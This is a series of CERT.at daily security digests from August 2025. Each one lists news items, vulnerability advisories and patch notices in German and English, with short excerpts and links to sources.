∗∗∗ --------------------------------------------- Eine große Studie in einem US-Gesundheitsunternehmen zeigt, dass gängige Phishing-Trainings das Risiko kaum senken – egal wie intensiv oder interaktiv sie sind. --------------------------------------------- https://www.heise.de/news/Verbesserung-von-nur-1-7-Prozent-Phishing-Trainin… ∗∗∗ MadeYouReset: Neue DDoS-Angriffstechnik legt Webserver lahm ∗∗∗ --------------------------------------------- Forscher haben eine neue Sicherheitslücke entdeckt, die viele gängige HTTP/2-Implementierungen betrifft. Server lassen sich mit wenig Aufwand überlasten. [..] Als anfällig gelten mehrere weitverbreitete HTTP/2-Serverimplementierungen wie Netty, Apache Tomcat, H2O, SwiftNIO und F5 BIG-IP. Weitere betroffene Implementierungen sowie etwaige Reaktionen der Anbieter sind in einer Meldung des CERT Coordination Center der Carnegie Mellon University zu finden. --------------------------------------------- https://www.golem.de/news/madeyoureset-neue-ddos-angriffstechnik-legt-webse… ∗∗∗ Evolution of the PipeMagic backdoor: from the RansomExx incident to CVE-2025-29824 ∗∗∗ --------------------------------------------- We examine the evolution of the PipeMagic backdoor and the TTPs of its operators – from the RansomExx incident in 2022 to attacks in Brazil and Saudi Arabia, and the exploitation of CVE-2025-29824 in 2025. --------------------------------------------- https://securelist.com/pipemagic/117270/ ∗∗∗ How Researchers Collect Indicators of Compromise ∗∗∗ --------------------------------------------- Today, we'll demonstrate a simple workflow showing how researchers use various tools to collect indicators of compromise (IOCs) and develop appropriate signatures from detonated malware. --------------------------------------------- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/how-researc… ∗∗∗ ERMAC V3.0 Banking Trojan Source Code Leak Exposes Full Malware Infrastructure ∗∗∗ --------------------------------------------- "The newly uncovered version 3.0 reveals a significant evolution of the malware, expanding its form injection and data theft capabilities to target more than 700 banking, shopping, and cryptocurrency applications," Hunt.io said in a report. --------------------------------------------- https://thehackernews.com/2025/08/ermac-v30-banking-trojan-source-code.html ∗∗∗ Mobile Phishers Target Brokerage Accounts in ‘Ramp and Dump’ Cashout Scheme ∗∗∗ --------------------------------------------- Cybercriminal groups peddling sophisticated phishing kits that convert stolen card data into mobile wallets have recently shifted their focus to targeting customers of brokerage services, new research shows. Undeterred by security controls at these trading platforms that block users from wiring funds directly out of accounts, the phishers have pivoted to using multiple compromised brokerage accounts in unison to manipulate the prices of foreign stocks. --------------------------------------------- https://krebsonsecurity.com/2025/08/mobile-phishers-target-brokerage-accoun… ∗∗∗ Scammers turn to ‘ghost-tapping’ retail fraud to launder funds ∗∗∗ --------------------------------------------- In a report released Thursday, researchers at Recorded Future’s Insikt Group detailed what they call “ghost-tapping” — when stolen payment card details are uploaded onto a burner phone and used in-person to purchase goods. --------------------------------------------- https://therecord.media/scammers-ghost-tapping-retail-fraud-launder-cash ∗∗∗ Cyberattack on Dutch prosecution service is keeping speed cameras offline ∗∗∗ --------------------------------------------- Who knew zero-days could be so useful to highway speedsters? The lingering effects of a cyberattack on the Public Prosecution Service of the Netherlands are preventing it from reactivating speed cameras across the country. --------------------------------------------- https://go.theregister.com/feed/www.theregister.com/2025/08/15/cyberattack_… ∗∗∗ KI-gestützte Cyberangriffe: Experten beobachten zunehmenden LLM-Einsatz ∗∗∗ --------------------------------------------- Sicherheitsforscher sehen aktuell eine Zunahme KI-unterstützter Angriffe und damit einen Wendepunkt im Cyberwettrüsten. [..] Ukrainische Behörden und mehrere Cybersicherheitsunternehmen konnten die Schadsoftware im Juli erstmals nachweisen. [..] Mit dem zunehmenden Einsatz von KI-Agenten sehen Experten ein neues Risiko für die Zukunft. --------------------------------------------- https://www.heise.de/news/KI-gestuetzte-Cyberangriffe-Experten-beobachten-z… ∗∗∗ Terraform Cloud token abuse turns speculative plan into remote code execution ∗∗∗ --------------------------------------------- Platforms like Terraform are great for making cloud management easier, but that same convenience can work in an attacker’s favour. Increasingly, we’re seeing Terraform used as a pivot point, letting attackers sidestep the usual security roadblocks of MFA and conditional access via token abuse, which remain one of the weaker links in the chain. --------------------------------------------- https://www.pentestpartners.com/security-blog/terraform-token-abuse-specula… ∗∗∗ libxml2 Maintainer Ends Embargoed Vulnerability Reports, Citing Unsustainable Burden ∗∗∗ --------------------------------------------- The lone volunteer maintainer of libxml2, one of the open source ecosystem’s most widely used XML parsing libraries, has announced a policy shift that drops support for embargoed security vulnerability reports. This change highlights growing frustration among unpaid maintainers bearing the brunt of big tech’s security demands without compensation or support. --------------------------------------------- https://socket.dev/blog/libxml2-maintainer-ends-embargoed-vulnerability-rep… ∗∗∗ Technical Analysis of SAP Exploit Script (Visual Composer “Metadata Uploader” Exploit)… ∗∗∗ --------------------------------------------- This script targets a critical zero-day vulnerability (now identified as CVE-2025–31324) in SAP NetWeaver’s Visual Composer Metadata Uploader component. The vulnerability is a missing authorization check on the HTTP endpoint /developmentserver/metadatauploader, allowing unauthenticated file uploads to the server’s filesystem. [..] The blog contains further pseudo code for detection and examples for another way to exploit the vulnerability. --------------------------------------------- https://detect.fyi/technical-analysis-of-sap-exploit-script-visual-composer… ===================== = Vulnerabilities = ===================== ∗∗∗ Security updates for Friday ∗∗∗ --------------------------------------------- Security updates have been issued by AlmaLinux (kernel and webkit2gtk3), Debian (aide and postgresql-13), Fedora (libtiff, mupdf, and pandoc), SUSE (cairo, chromium, gstreamer-plugins-base, ImageMagick, iputils, kubernetes1.23, kubernetes1.26, matrix-synapse, Mesa, pgadmin4, python3, qemu, and rz-pm), and Ubuntu (aide). --------------------------------------------- https://lwn.net/Articles/1033901/ ∗∗∗ Security updates for Monday ∗∗∗ --------------------------------------------- Security updates have been issued by AlmaLinux (go-toolset:rhel8, kernel, and kernel-rt), Fedora (chromium), Oracle (libxml2), Red Hat (go-toolset:rhel8, golang, kernel, kernel-rt, openjpeg2, rsync, and tigervnc), and SUSE (apache-commons-lang3, chromedriver, fractal, framework_tool, go1.23-openssl, go1.24-openssl, grub2, gstreamer-devtools, gstreamer-plugins-rs, jasper, libavif, lighttpd, nginx, podman, postgresql13, postgresql14, postgresql15, postgresql16, python311-pypdf, ruby2.5, rust-keylime, tiff, tomcat, tomcat10, and tomcat11). --------------------------------------------- https://lwn.net/Articles/1034267/ -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/mailman3/postorius/lists/daily.lists.cert.at/

1 0

Tageszusammenfassung - 14.08.2025
by Daily end-of-shift report 14 Aug '25

14 Aug '25

===================== = End-of-Day report = ===================== Timeframe: Mittwoch 13-08-2025 18:00 − Donnerstag 14-08-2025 18:00 Handler: Michael Schlagenhaufer Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Spike in Fortinet VPN brute-force attacks raises zero-day concerns ∗∗∗ --------------------------------------------- A massive spike in brute-force attacks targeted Fortinet SSL VPNs earlier this month, followed by a switch to FortiManager, marked a deliberate shift in targeting that has historically preceded new vulnerability disclosures. --------------------------------------------- https://www.bleepingcomputer.com/news/security/spike-in-fortinet-vpn-brute-… ∗∗∗ New downgrade attack can bypass FIDO auth in Microsoft Entra ID ∗∗∗ --------------------------------------------- Security researchers have created a new FIDO downgrade attack against Microsoft Entra ID that tricks users into authenticating with weaker login methods, making them susceptible to phishing and session hijacking. --------------------------------------------- https://www.bleepingcomputer.com/news/security/new-downgrade-attack-can-byp… ∗∗∗ When Hackers Call: Social Engineering, Abusing Brave Support, and EncryptHub’s Expanding Arsenal ∗∗∗ --------------------------------------------- Trustwave SpiderLabs researchers have recently identified an EncryptHub campaign that combines social engineering with abuse of the Brave Support platform to deliver malicious payloads via the CVE-2025-26633 vulnerability. In this blog post, we will break down the techniques used in the campaign and highlight the new tools employed by the threat group. --------------------------------------------- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/when-hacker… ∗∗∗ A Mega Malware Analysis Tutorial Featuring Donut-Generated Shellcode ∗∗∗ --------------------------------------------- The motivation behind writing this post is that we want to provide the kind of resource that we wouldve liked to have seen more of when starting our own careers in malware research. --------------------------------------------- https://github.com/PaloAltoNetworks/Unit42-Threat-Intelligence-Article-Info… ∗∗∗ Crypto24 Ransomware Group Blends Legitimate Tools with Custom Malware for Stealth Attacks ∗∗∗ --------------------------------------------- Crypto24 is a ransomware group that stealthily blends legitimate tools with custom malware, using advanced evasion techniques to bypass security and EDR technologies. --------------------------------------------- https://www.trendmicro.com/en_us/research/25/h/crypto24-ransomware-stealth-… ===================== = Vulnerabilities = ===================== ∗∗∗ N-central 2025.3.1 ∗∗∗ --------------------------------------------- This release includes a critical security fix for CVE-2025-8875 and CVE-2025-8876. These vulnerabilities require authentication to exploit. --------------------------------------------- https://status.n-able.com/2025/08/13/announcing-the-ga-of-n-central-2025-3-… ∗∗∗ Security updates for Thursday ∗∗∗ --------------------------------------------- Security updates have been issued by AlmaLinux (kernel, python3.11-setuptools, thunderbird, and toolbox), Debian (chromium), Fedora (open62541 and perl-Authen-SASL), Oracle (git, kernel, konsole, and webkit2gtk3), SUSE (framework-inputmodule-control and poppler), and Ubuntu (apache2, mysql-8.0, mysql-8.4, node-qs, request-tracker5, and ruby-sidekiq). --------------------------------------------- https://lwn.net/Articles/1033737/ ∗∗∗ Rockwell Automation Security Advisories 14.08.2025 ∗∗∗ --------------------------------------------- Rockwell Automation has released 6 new security advisories (3x Critical, 3x High) --------------------------------------------- https://www.rockwellautomation.com/en-us/trust-center/security-advisories.h… ∗∗∗ Sicherheitspatches: Angreifer können Schadcode auf GitLab-Servern verankern ∗∗∗ --------------------------------------------- Die GitLab-Entwickler haben insgesamt zwölf Sicherheitslücken geschlossen. Angreifer können Systeme kompromittieren. [..] In einer Warnmeldung versichern die Verantwortlichen, dass GitLab.com bereits abgesichert sei. Sie empfehlen, dass Admins von On-premise-Instanzen die reparierten Ausgaben 18.0.6, 18.1.4 oder 18.2.2 zeitnah installieren sollten. Noch gibt es keine Informationen, ob bereits Attacken laufen. --------------------------------------------- https://heise.de/-10523017 ∗∗∗ Nvidia stopft Sicherheitslücken in KI-Software ∗∗∗ --------------------------------------------- In diverser KI-Software von Nvidia haben die Entwickler Sicherheitslücken gefunden. Diese stellen teils ein hohes Risiko dar. [..] Betroffen sind die Nvidia-Projekte Apex, Isaac-GR00T, Megatron LM, Merlin Transformers4Rec, NeMo Framework sowie WebDataset. --------------------------------------------- https://heise.de/-10524310 ∗∗∗ Foxit PDF Reader: Präparierte PDFs können Schadcode auf PCs schleusen ∗∗∗ --------------------------------------------- Sicherheitsupdates für Foxit PDF Reader und Editor schließen mehrere Sicherheitslücken. [..] Im schlimmsten Fall kann Schadcode auf Systeme gelangen und diese vollständig kompromittieren. Das kann etwa über mit JavaScript präparierte PDFs erfolgen (etwa CVE-2025-55313 "hoch"). Dabei ist aber davon auszugehen, dass Opfer mitspielen und so eine Datei öffnen müssen, damit eine Attacke eingeleitet werden kann. --------------------------------------------- https://heise.de/-10524778 ∗∗∗ Drupal: Layout Builder Advanced Permissions - Moderately critical - Access bypass - SA-CONTRIB-2025-097 ∗∗∗ --------------------------------------------- https://www.drupal.org/sa-contrib-2025-097 ∗∗∗ Drupal: Authenticator Login - Highly critical - Access bypass - SA-CONTRIB-2025-096 ∗∗∗ --------------------------------------------- https://www.drupal.org/sa-contrib-2025-096 ∗∗∗ Drupal: Authenticator Login - Highly critical - Access bypass - SA-CONTRIB-2025-096 ∗∗∗ --------------------------------------------- https://www.drupal.org/sa-contrib-2025-096 ∗∗∗ ABB: 2025-08-12: Cyber Security Advisory -ABB AbilityTM zenon Remote Transport Vulnerability ∗∗∗ --------------------------------------------- https://search.abb.com/library/Download.aspx?DocumentID=2NGA002743&Language… ∗∗∗ ABB: 2025-08-11: Cyber Security Advisory -ELSB/BLBA ASPECT advisory several CVEs ∗∗∗ --------------------------------------------- https://search.abb.com/library/Download.aspx?DocumentID=9AKK108471A4462&Lan… ∗∗∗ TYPO3-PSA-2025-001: Sanitization bypass in SVG Sanitizer ∗∗∗ --------------------------------------------- https://typo3.org/security/advisory/typo3-psa-2025-001 ∗∗∗ Siemens: SSA-395458 V1.0: Account Hijacking Vulnerability in Mendix SAML Module ∗∗∗ --------------------------------------------- https://cert-portal.siemens.com/productcert/html/ssa-395458.html ∗∗∗ Wordfence Intelligence Weekly WordPress Vulnerability Report (August 4, 2025 to August 10, 2025) ∗∗∗ --------------------------------------------- https://www.wordfence.com/blog/2025/08/wordfence-intelligence-weekly-wordpr… ∗∗∗ Bosch: Vulnerabilities in ctrlX OS - Setup ∗∗∗ --------------------------------------------- https://psirt.bosch.com/security-advisories/bosch-sa-129652.html ∗∗∗ Bosch: Denial of Service on Rexroth Fieldbus Couplers ∗∗∗ --------------------------------------------- https://psirt.bosch.com/security-advisories/bosch-sa-757244.html ∗∗∗ Kubernetes: CVE-2025-5187 ∗∗∗ --------------------------------------------- https://github.com/kubernetes/kubernetes/issues/133471 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/mailman3/postorius/lists/daily.lists.cert.at/

1 0

Tageszusammenfassung - 13.08.2025
by Daily end-of-shift report 13 Aug '25

13 Aug '25

===================== = End-of-Day report = ===================== Timeframe: Dienstag 12-08-2025 18:00 − Mittwoch 13-08-2025 18:00 Handler: Michael Schlagenhaufer Co-Handler: Felician Fuchs ===================== = News = ===================== ∗∗∗ Docker Hub still hosts dozens of Linux images with the XZ backdoor ∗∗∗ --------------------------------------------- The XZ-Utils backdoor, first discovered in March 2024, is still present in at least 35 Linux images on Docker Hub, potentially putting users, organizations, and their data at risk. --------------------------------------------- https://www.bleepingcomputer.com/news/security/docker-hub-still-hosts-dozen… ∗∗∗ New trends in phishing and scams: how AI and social media are changing the game ∗∗∗ --------------------------------------------- Common tactics in phishing and scams in 2025: learn about the use of AI and deepfakes, phishing via Telegram, Google Translate and Blob URLs, biometric data theft, and more. --------------------------------------------- https://securelist.com/new-phishing-and-scam-trends-in-2025/117217/ ∗∗∗ Geld zurück nach Krypto-Betrug? Vorsicht vor Recovery Scam! ∗∗∗ --------------------------------------------- Was einmal geklappt hat, kann wieder funktionieren. Darauf hoffen Kriminelle und kontaktieren jene Menschen, denen sie in der Vergangenheit durch Krypto- bzw. Investmentbetrug geschadet haben. Sie geben sich als Agentur, Behörde etc. aus, die dabei helfen kann, das verlorene Geld zurückzuholen. --------------------------------------------- https://www.watchlist-internet.at/news/vorsicht-vor-recovery-scam/ ∗∗∗ The MedusaLocker ransomware gang is hiring penetration testers ∗∗∗ --------------------------------------------- MedusaLocker, the ransomware-as-a-service group that has been active since 2019 is openly recruiting for penetration testers to help it compromise more businesses. --------------------------------------------- https://www.fortra.com/blog/medusalocker-ransomware-gang-hiring-penetration… ∗∗∗ Malvertising campaign leads to PS1Bot, a multi-stage malware framework ∗∗∗ --------------------------------------------- Cisco Talos has observed an ongoing malware campaign that seeks to infect victims with a multi-stage malware framework, implemented in PowerShell and C#, which we are referring to as “PS1Bot.” --------------------------------------------- https://blog.talosintelligence.com/ps1bot-malvertising-campaign/ ∗∗∗ Microsoft Patchday August 2025: Sicherheitseinschätzungen von Tenable ∗∗∗ --------------------------------------------- Zum 12. August 2025 hat Microsoft zum Patchday Sicherheitsupdates für die noch im Support befindlichen Produkte veröffentlich und Schwachstellen geschlossen. [..] Inzwischen liegt mir eine Einschätzung seitens Tenable im Hinblick auf die Auswirkungen der Schwachstellen vor, die ich hier einfach zur Information in den Blog einstelle. --------------------------------------------- https://www.borncity.com/blog/2025/08/13/microsoft-patchday-august-2025-sic… ===================== = Vulnerabilities = ===================== ∗∗∗ Exchange Server Sicherheitsupdates August 2025 ∗∗∗ --------------------------------------------- Microsoft hat zum 12. August 2025 das "August 2025" Sicherheitsupdate für Exchange Server freigegeben. Das Sicherheitsupdate gilt Exchange Server 2016, Exchange Server 2019, und erstmals für Exchange Server Subscription Edition (SE). --------------------------------------------- https://www.borncity.com/blog/2025/08/12/exchange-server-sicherheitsupdates… ∗∗∗ Microsoft Security Update Summary (12. August 2025) ∗∗∗ --------------------------------------------- Microsoft hat am 12. August 2025 Sicherheitsupdates für Windows-Clients und -Server, für Office – sowie für weitere Produkte – veröffentlicht. Die Sicherheitsupdates beseitigen 107 Schwachstellen (CVEs), eine davon wurde als 0-day klassifiziert und war öffentlich bekannt. --------------------------------------------- https://www.borncity.com/blog/2025/08/12/microsoft-security-update-summary-… ∗∗∗ Angriff über Websites: Kritische Grafik-Schwachstellen gefährden Windows-Nutzer ∗∗∗ --------------------------------------------- Während sich CVE-2025-50165 nur auf Windows 11 24H2 und Windows Server 2025 bezieht, ist die Zahl der anfälligen Systeme im Falle von CVE-2025-53766 deutlich höher. [..] Beide lassen sich demnach über das Netzwerk ausnutzen und erfordern vorab keinerlei Authentifizierung oder Nutzerinteraktion. Die Angriffskomplexität ist laut Microsoft jeweils gering. --------------------------------------------- https://www.golem.de/news/angriff-ueber-websites-kritische-grafik-schwachst… ∗∗∗ AMD und Intel stopfen zahlreiche Sicherheitslücken ∗∗∗ --------------------------------------------- AMD und Intel haben im August Updates herausgegeben, die zahlreiche Sicherheitslücken in VGA- sowie Netzwerktreibern und Prozessoren schließen. --------------------------------------------- https://heise.de/-10520732 ∗∗∗ Patchday: Mehrere Fortinet-Produkte sind angreifbar ∗∗∗ --------------------------------------------- Am gefährlichsten gilt einer Warnmeldung zufolge eine "kritische" Sicherheitslücke (CVE-2025-25256) in der IT-Sicherheitslösung FortiSIEM. An dieser Stelle können Angreifer ohne Authentifizierung mit präparierten CLI-Anfragen ansetzen, um Schadcode auszuführen. [..] Wie ein Sicherheitsforscher in einem Beitrag schreibt, können Angreifer die Authentifizierung von FortiWeb-Firewalls umgehen. --------------------------------------------- https://heise.de/-10519770 ∗∗∗ Zoom: Windows-Clients ermöglichen Angriffe aus dem Netz ∗∗∗ --------------------------------------------- Zwei Sicherheitslücken meldet Zoom in den Windows-Clients. Sie ermöglicht Angreifern aus dem Netz ohne vorherige Anmeldung, ihre Rechte auszuweiten. [..] Details dazu, wie Angriffe aussehen könnten, nennen sie hingegen nicht. --------------------------------------------- https://heise.de/-10520206 ∗∗∗ Adobe Patch Tuesday Fixes Over 60 Vulnerabilities Across 13 Products ∗∗∗ --------------------------------------------- Adobe has issued a new set of security patches addressing more than 60 vulnerabilities across 13 of its widely used software products. This update, part of the company’s routine Adobe Patch Tuesday cycle, includes critical fixes for applications ranging from Adobe Commerce and Illustrator to its Substance 3D suite. --------------------------------------------- https://thecyberexpress.com/adobe-security-update-2/ ∗∗∗ VU#767506: HTTP/2 implementations are vulnerable to "MadeYouReset" DoS attack through HTTP/2 control frames ∗∗∗ --------------------------------------------- OverviewA vulnerability has been discovered within many HTTP/2 implementations allowing for denial of service (DoS) attacks through HTTP/2 control frames. This vulnerability is colloquially known as "MadeYouReset" and is tracked as CVE-2025-8671. [..] Various vendors have provided patches and statements to address the vulnerability. Please review their statements below. --------------------------------------------- https://kb.cert.org/vuls/id/767506 ∗∗∗ Security updates for Wednesday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (apache2, kernel, linux-6.1, openjdk-17, and pgpool2), Fedora (glib2, matrix-synapse, openjpeg, python3-docs, and python3.13), Oracle (gdk-pixbuf2, glibc, java-1.8.0-openjdk, kernel, libxml2, python-requests, python3.11-setuptools, and thunderbird), SUSE (amber-cli, apache-commons-lang3, eclipse-jgit, go1.23, go1.24, govulncheck-vulndb, grub2, icinga2, kubernetes1.23, libgcrypt, python3, python313, sccache, slurm, tiff, and webkit2gtk3), and Ubuntu (linux-oracle). --------------------------------------------- https://lwn.net/Articles/1033588/ ∗∗∗ Palo Alto Networks Security Advisories 2025-08-13 ∗∗∗ --------------------------------------------- https://security.paloaltonetworks.com/ ∗∗∗ f5: K000152635: Quarterly Security Notification (August 2025) ∗∗∗ --------------------------------------------- https://my.f5.com/manage/s/article/K000152635 ∗∗∗ Johnson Controls iSTAR Ultra, iSTAR Ultra SE, iSTAR Ultra G2, iSTAR Ultra G2 SE, iSTAR Edge G2 ∗∗∗ --------------------------------------------- https://www.cisa.gov/news-events/ics-advisories/icsa-25-224-02 ∗∗∗ Santesoft Sante PACS Server ∗∗∗ --------------------------------------------- https://www.cisa.gov/news-events/ics-medical-advisories/icsma-25-224-01 ∗∗∗ AVEVA PI Integrator ∗∗∗ --------------------------------------------- https://www.cisa.gov/news-events/ics-advisories/icsa-25-224-04 ∗∗∗ Ashlar-Vellum Cobalt, Xenon, Argon, Lithium, Cobalt Share ∗∗∗ --------------------------------------------- https://www.cisa.gov/news-events/ics-advisories/icsa-25-224-01 ∗∗∗ Schneider Electric EcoStruxure Power Monitoring Expert ∗∗∗ --------------------------------------------- https://www.cisa.gov/news-events/ics-advisories/icsa-25-224-03 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/mailman3/postorius/lists/daily.lists.cert.at/

1 0

Tageszusammenfassung - 12.08.2025
by Daily end-of-shift report 12 Aug '25

12 Aug '25

===================== = End-of-Day report = ===================== Timeframe: Montag 11-08-2025 18:00 − Dienstag 12-08-2025 18:00 Handler: Michael Schlagenhaufer Co-Handler: Felician Fuchs ===================== = News = ===================== ∗∗∗ Netherlands: Citrix Netscaler flaw CVE-2025-6543 exploited to breach orgs ∗∗∗ --------------------------------------------- The Netherlands National Cyber Security Centre (NCSC) is warning that a critical Citrix NetScaler vulnerability tracked as CVE-2025-6543 was exploited to breach "critical organizations" in the country. --------------------------------------------- https://www.bleepingcomputer.com/news/security/netherlands-citrix-netscaler… ∗∗∗ Over 3,000 NetScaler devices left unpatched against CitrixBleed 2 bug ∗∗∗ --------------------------------------------- Over 3,300 Citrix NetScaler devices remain unpatched against a critical vulnerability that allows attackers to bypass authentication by hijacking user sessions, nearly two months after patches were released. --------------------------------------------- https://www.bleepingcomputer.com/news/security/over-3-000-netscaler-devices… ∗∗∗ Scam hunter scammed by tax office impersonators ∗∗∗ --------------------------------------------- Scam hunter Julie-Anne Kearns, who helps scam victims online, opened up about a tax scam she fell for herself. --------------------------------------------- https://www.malwarebytes.com/blog/news/2025/08/scam-hunter-scammed-by-tax-o… ∗∗∗ Russian-Linked Curly COMrades Deploy MucorAgent Malware in Europe ∗∗∗ --------------------------------------------- A new report from Bitdefender reveals the Russian-linked hacking group Curly COMrades is targeting Eastern Europe with a new backdoor called MucorAgent. Learn how they’re using advanced tactics to steal data. --------------------------------------------- https://hackread.com/russian-curly-comrades-mucoragent-malware-europe/ ===================== = Vulnerabilities = ===================== ∗∗∗ Security Advisory Ivanti Connect Secure, Policy Secure & ZTA Gateways (Multiple CVEs) ∗∗∗ --------------------------------------------- Ivanti has released updates for Ivanti Connect Secure which addresses medium, high, and critical vulnerabilities. At the time of disclosure, there have been no reports of customers being exploited by this vulnerability. --------------------------------------------- https://forums.ivanti.com/s/article/August-Security-Advisory-Ivanti-Connect… ∗∗∗ August Security Advisory Ivanti Virtual Application Delivery Controller (vADC previously vTM) (CVE-2025-8310) ∗∗∗ --------------------------------------------- Ivanti has released updates for Ivanti Virtual Application Delivery Controller (vADC), previously Virtual Traffic Manager (vTM), which addresses one medium severity vulnerability. Successful exploitation could lead to account takeover. At the time of disclosure, there have been no reports of customers being exploited by this vulnerability. --------------------------------------------- https://forums.ivanti.com/s/article/August-Security-Advisory-Ivanti-Virtual… ∗∗∗ 40,000 WordPress Sites Affected by Arbitrary File Read Vulnerability in UiCore Elements WordPress Plugin ∗∗∗ --------------------------------------------- On June 13th, 2025, we received a submission for an Arbitrary File Read vulnerability in UiCore Elements, a WordPress plugin with more than 40,000 active installations. This vulnerability makes it possible for an unauthenticated attacker to read arbitrary files on the server, which can contain sensitive information. During the disclosure process, our investigation revealed that the vulnerability leveraged an underlying issue in Elementor’s import functionality. --------------------------------------------- https://www.wordfence.com/blog/2025/08/40000-wordpress-sites-affected-by-ar… ∗∗∗ Security updates for Tuesday ∗∗∗ --------------------------------------------- Security updates have been issued by AlmaLinux (kernel, kernel-rt, and python-requests), Debian (ca-certificates-java), Fedora (chromium, clash-meta, mingw-python3, openjpeg, php-adodb, and toolbox), Mageia (kernel and kernel-linus), SUSE (chromium, ImageMagick, libgcrypt, libssh, libxml2, opensc, postgresql14, and postgresql16), and Ubuntu (dnsmasq, linux-gcp-6.8, linux-raspi, linux-oracle-6.14, and openjdk-17). --------------------------------------------- https://lwn.net/Articles/1033445/ ∗∗∗ Vtenext 25.02: A three-way path to RCE ∗∗∗ --------------------------------------------- Multiple vulnerabilities in vtenext 25.02 and prior versions allow unauthenticated attackers to bypass authentication through three separate vectors, ultimately leading to remote code execution on the underlying server. --------------------------------------------- https://blog.sicuranext.com/vtenext-25-02-a-three-way-path-to-rce/ ∗∗∗ OMSA-2025-0004: Omnissa Workspace ONE UEM addresses multiple vulnerabilities (CVE-2025-25229, CVE-2025-25231) ∗∗∗ --------------------------------------------- https://www.omnissa.com/omsa-2025-0004/ ∗∗∗ OMSA-2025-0003: Omnissa Secure Email Gateway (SEG) updates address Server-Side Request Forgery (SSRF) vulnerability (CVE-2025-25235) ∗∗∗ --------------------------------------------- https://www.omnissa.com/omsa-2025-0003/ ∗∗∗ Matrix protocol vulnerabilities fixed in room version 12 ∗∗∗ --------------------------------------------- https://matrix.org/blog/2025/08/security-release/ -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/mailman3/postorius/lists/daily.lists.cert.at/

1 0

Tageszusammenfassung - 11.08.2025
by Daily end-of-shift report 11 Aug '25

11 Aug '25

===================== = End-of-Day report = ===================== Timeframe: Freitag 08-08-2025 18:00 − Montag 11-08-2025 18:00 Handler: Felician Fuchs Co-Handler: Michael Schlagenhaufer ===================== = News = ===================== ∗∗∗ WinRAR zero-day flaw exploited by RomCom hackers in phishing attacks ∗∗∗ --------------------------------------------- A recently fixed WinRAR vulnerability tracked as CVE-2025-8088 was exploited as a zero-day in phishing attacks to install the RomCom malware. [..] The flaw is a directory traversal vulnerability that was fixed in WinRAR 7.13, which allows specially crafted archives to extract files into a file path selected by the attacker. --------------------------------------------- https://www.bleepingcomputer.com/news/security/winrar-zero-day-flaw-exploit… ∗∗∗ Command Injection in Jenkins via Git Parameter (CVE-2025-53652) ∗∗∗ --------------------------------------------- On July 9, Jenkins disclosed CVE-2025-53652 (aka SECURITY-34191), one of 31 plugin vulnerabilities announced that day. [..] was disclosed as medium severity, but it enables command injection via the Jenkins Git Parameter plugin. [..] Around 15,000 Jenkins servers appear to allow unauthenticated access, making RCE viable in the wild. [..] The patch can be disabled, so detection remains important even after upgrading. --------------------------------------------- https://www.vulncheck.com/blog/git-parameter-rce ∗∗∗ EU law to protect journalists from spyware takes effect ∗∗∗ --------------------------------------------- Critics from press freedom groups say member states have not taken steps to give the law any teeth. --------------------------------------------- https://therecord.media/eu-law-to-protect-journalists-from-spyware-takes-ef… ∗∗∗ Sicherheitslücken: Hacker knackt Auto über Webportal des Herstellers ∗∗∗ --------------------------------------------- Er konnte nicht nur aus der Ferne unzählige fremde Autos orten, entriegeln und starten, sondern auch nach Belieben die Halterdaten abfragen. [..] Zveare stellte seine Entdeckungen am vergangenen Sonntag auf der Def Con in Las Vegas vor. Den Angaben zufolge konnte er sich in dem besagten Händlerportal ein "nationales Administratorkonto" erstellen und erhielt damit einen weitreichenden Zugriff, der "nur wenigen ausgewählten Unternehmensnutzern vorbehalten ist" und "eine Vielzahl von lustigen Exploits" ermöglichte. --------------------------------------------- https://www.golem.de/news/sicherheitsluecken-hacker-knackt-auto-ueber-webpo… ∗∗∗ Spionage: Rauchwarnmelder in Abhörwanzen verwandelt ∗∗∗ --------------------------------------------- Zwei junge Sicherheitsforscher haben im Rahmen der Def Con in Las Vegas Sicherheitslücken in smarten Rauchwarnmeldern des Typs Halo 3C aufgedeckt. [..] Der Hersteller der Halo-3C-Warnmelder hört auf den Namen IPVideo und ist laut der Webseite seit 2023 Teil von Motorola Solutions. Das Unternehmen hat dem Wired-Bericht zufolge bereits ein Firmwareupdate bereitgestellt, um die von Garcia und seinem Kollegen entdeckten Sicherheitslücken zu schließen. Mit der Cloud verbundene Geräte sollen das Update automatisch erhalten. --------------------------------------------- https://www.golem.de/news/spionage-smarte-rauchwarnmelder-in-abhoerwanzen-v… ∗∗∗ Researchers Reveal ReVault Attack Targeting Dell ControlVault3 Firmware in 100+ Laptop Models ∗∗∗ --------------------------------------------- Cybersecurity researchers have uncovered multiple security flaws in Dells ControlVault3 firmware and its associated Windows APIs that could have been abused by attackers to bypass Windows login, extract cryptographic keys, as well as maintain access even after a fresh operating system install by deploying undetectable malicious implants into the firmware. [..] Attackers can chain the vulnerabilities, which were presented at the Black Hat USA security conference, to escalate their privileges after initial access, bypass authentication controls, and maintain persistence on compromised systems that survive operating system updates or reinstallations. --------------------------------------------- https://thehackernews.com/2025/08/researchers-reveal-revault-attack.html ∗∗∗ DEF CON hackers plug security holes in US water systems amid tsunami of threats ∗∗∗ --------------------------------------------- A DEF CON hacker walks into a small-town water facility … no, this is not the setup for a joke or a (super-geeky) odd-couple rom-com. It's a true story that happened at five utilities across four states. --------------------------------------------- https://go.theregister.com/feed/www.theregister.com/2025/08/10/def_con_hack… ∗∗∗ libarchive: Sicherheitslücke entpuppt sich als kritisch ∗∗∗ --------------------------------------------- In der Open-Source-Kompressionsbibliothek libarchive klafft eine Sicherheitslücke, die zunächst als lediglich niedriges Risiko eingestuft wurde. [..] Die ursprüngliche Meldung der Lücke an das libarchive-Projekt durch Tobias Stöckmann mitsamt eines Proof-of-Concept-Exploits fand bereits am 10. Mai dieses Jahres statt. Am 20. Mai haben die Entwickler die Version 3.8.0 von libarchive herausgegeben. Die öffentliche Schwachstellenmeldung erfolgte am 9. Juni ebenfalls auf Github. Dort wurde auch die CVE-Nummer CVE-2025-5914 zugewiesen, jedoch zunächst mit dem Schweregrad CVSS 3.9, Risiko "niedrig", wie Red Hat die Lücke einordnete. --------------------------------------------- https://www.heise.de/news/libarchive-Sicherheitsluecke-entpuppt-sich-als-kr… 